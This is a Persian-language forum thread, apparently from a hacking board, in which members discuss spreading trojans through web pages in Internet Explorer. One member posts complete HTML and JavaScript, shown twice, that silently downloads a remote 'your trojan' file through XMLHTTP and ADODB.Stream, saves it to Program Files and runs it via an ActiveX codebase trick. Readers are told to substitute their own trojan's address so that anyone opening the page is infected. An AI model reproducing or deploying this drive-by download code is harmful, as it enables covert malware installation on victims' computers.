توی این پست کسی به نام بهزاد داریم.
اگه هست .
ببین این به کارت می خوره
http://www.2-spyware.com/file-mastoer32-dll.html
اگه به کارت می خوره تا راه انتشارش رو بگم . از طریق html
بای.
در ضمن چرا توی وبلاگ کامنت گذاشتی ؟؟
پیغام خصوصی می دادی !!
سلام
شرمنده يه سوتي برنامه نويسي بود که حل شد
قضيه اين بود که برنامه بايد فايل سرور رو توسط فايل کمپرسور فشرده کنه
ولي اين برنامه هر دو دفعه فايل سرور رو کپي مي کرد
(اگه توجه کني هردوتا فايل يکيه)
حالا چرا ناراحت شدي
من هيچوقت نميام با يه تروجان به جون ملت بيفتم وقتي کسي رو نميشناسم اطلاعاتش به چه درد من مي خوره؟!!!
ثانيا من نميام يه فايل ويروسو
عمدا تو يه سايت برنامه نويسي بزارم
که خودمو خراب کنم
اگه هنوزم شک داري ميتونم سورسشو بهت بدم
يا خودت اسمبليشو بخون
بازم شرمندتم
برنامه رو هم درستش کردم:
http://www.crazyangel.persiangig.com/document/DBSpy.exe
برنامه ي تبديل به HTML هم تو وبلاگ هست
اينه:
ما که حرفی نداريم
خوبه که مشکل حل شد.
برنامه های تبدیل کننده فایل اجرایی به اسکریپت که از طریق اینترنت اکسپلورر اجرا بشه دیگه جواب نمیدن فقط برای IE 5.5 به پایین جواب میده.
تنها راهش استفاده از اکسپلویت هست یا نصب Activex که البته راه دوم توی XP SP2 یه کم سخت چون به صورت پیش فرض بلاگ شده البته راههایی هم هست که بشه ویندوز رو کلک زد مثلا کاری کنی که ویندوز فکر کنه میخوای فلش پلیر نصب بشه.
من يه فايل ASP داشتم که حتي تو سرويس پک دو هم بدون هيچ اخطاري کار مي کرد.
بايد بگردم چون يه بار هاردمو کلا فورمت کردم و بازيابي کردم
پيداش کردم حتما واست ميزارمش
يه راه ديگه هم هست که الان بعضي آنتي ويروس ها مثل NOD32 مي فهمن
اونم اينه که از باگ JPEG استفاده کني و فايلتو تبديل به عکس کني
ولي فقط باگش تو اينترنت اکسپلورر کار مي کنه
چه جالب ادم چه چیزایی که نمیشنوه؟
منم ممنون میشم بزاریدش
همون asp که رو سرویس پکه 2 هم جواب میده و اگه میشه همین باگه jpeg
می تونی از یه اکتیو ایکس استفاده کنی
اون یه فایل html هستش که وقتی اونو اجرا میکنی فیلی که بهش آدرس دادی رو رو سیستم قربانی دانلود میکنه و بعد هم اجرا میکنه
------------------------------------------------------------
اینو تو یه نت پد بنویس بعد به سورت html سیو کن
فقط به جای your trojan آدرس تروجان خودت رو بده
مشکلی در این مورد داشتی بگو تا بگم
انیم سورس html :
---------------------------------------------------------------
<textarea id="code" style="display: none;">
s=new ActiveXObject("ADODB.Stream");
s.Mode=3;
s.Type=1;
s.Open();
x=new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET","your trojan",0);
x.Send(); s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\YPagr.exe",2);
</textarea>
<textarea id="code2" style="display: none;">
md="<object id=\"oFile\""+
"classid=\"clsid:11111111-1111-1111-1111-111111111111\""+
" codebase=\"c:/Program Files/YPagr.exe\"></object>";
w=createPopup();
w.document.clear(); w.document.write(md);
</textarea>
<script language="javascirpt">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/'/g,"\\'");
line = line.replace(/"/g,"\\\"");
line = line.replace(/[/]/g,"%2f");
line = line.replace(/\r\n/,"");
line += ' ';
if (line != '') {
result += line;
}
}
return result;
}
function weiter() {
open(myURL,"_search");
}
function starten(thecode) {
mycode = preparecode(thecode);
myURL = "file:javascirpt:eval('" + mycode + "')";
open("http:///","_search");
setTimeout("weiter()", 500);
}
function doit() {
starten(document.all.code.value);
setTimeout("doit2()", 600);
}
function doit2() {
starten(document.all.code2.value);
}
setTimeout("doit()", 500);
</script>
----------------------------------------------------------
حالا هر کی این html رو اجرا کنه فایل شما رو سیستمش دانلود میشه
بدون اینکه ...
cooper نوشته است:می تونی از یه اکتیو ایکس استفاده کنی
اون یه فایل html هستش که وقتی اونو اجرا میکنی فیلی که بهش آدرس دادی رو رو سیستم قربانی دانلود میکنه و بعد هم اجرا میکنه
------------------------------------------------------------
اینو تو یه نت پد بنویس بعد به سورت html سیو کن
فقط به جای your trojan آدرس تروجان خودت رو بده
مشکلی در این مورد داشتی بگو تا بگم
انیم سورس html :
---------------------------------------------------------------
<textarea id="code" style="display: none;">
s=new ActiveXObject("ADODB.Stream");
s.Mode=3;
s.Type=1;
s.Open();
x=new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET","your trojan",0);
x.Send(); s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\YPagr.exe",2);
</textarea>
<textarea id="code2" style="display: none;">
md="<object id=\"oFile\""+
"classid=\"clsid:11111111-1111-1111-1111-111111111111\""+
" codebase=\"c:/Program Files/YPagr.exe\"></object>";
w=createPopup();
w.document.clear(); w.document.write(md);
</textarea>
<script language="javascirpt">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/'/g,"\\'");
line = line.replace(/"/g,"\\\"");
line = line.replace(/[/]/g,"%2f");
line = line.replace(/\r\n/,"");
line += ' ';
if (line != '') {
result += line;
}
}
return result;
}
function weiter() {
open(myURL,"_search");
}
function starten(thecode) {
mycode = preparecode(thecode);
myURL = "file:javascirpt:eval('" + mycode + "')";
open("http:///","_search");
setTimeout("weiter()", 500);
}
function doit() {
starten(document.all.code.value);
setTimeout("doit2()", 600);
}
function doit2() {
starten(document.all.code2.value);
}
setTimeout("doit()", 500);
</script>
----------------------------------------------------------
حالا هر کی این html رو اجرا کنه فایل شما رو سیستمش دانلود میشه
بدون اینکه ...
عزيز اين كه همون shame soft بود